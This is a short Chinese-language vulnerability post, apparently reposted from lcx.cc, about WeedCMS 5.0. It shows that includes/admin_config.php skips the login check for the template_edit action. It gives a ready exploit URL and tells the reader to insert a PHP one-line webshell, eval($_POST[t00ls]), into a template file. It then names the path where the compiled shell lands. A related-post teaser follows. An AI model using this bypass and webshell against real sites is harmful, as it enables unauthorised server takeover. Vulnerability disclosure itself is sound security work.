问题文件在:includes/admin_config.php。
这个程序登录验证是一个对每个方法来验证登录,而不是对整个文件来验证。还是那句,看代码。
“includes/admin_config.php”中的问题代码: if($do=='template_edit'){ |
文件开头的方法每个IF后都验证一次,最后2个没有,估计这2个功能是后期加上去,可能当时作者的老人痴呆症发作了……
EXP:http://127.0.0.1/admin.php?action=config&do=template_edit&file=part_vote.html
在文件头插入“ eval($_POST[t00ls]);?>”,然后访问一次首页缓存就生成出来了。
最后马儿就在:http://127.0.0.1/temps/compile/part_vote.html.php。
文章来源于lcx.cc:野草内容管理系统 WeedCMS 5.0 写马漏洞
相关推荐: 一基友再遇奇葩无线网络环境,顺便求二级/三级/四级ISP的盈利方式?
一基友再遇奇葩无线网络环境,顺便求二级/三级/四级ISP的盈利方式? safe121 (Great Leader Kim Jong-Un General Long Live!!!) | 2014-02-12 07:37 话说今年春节的时候,老夫一基友同学回国过…
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论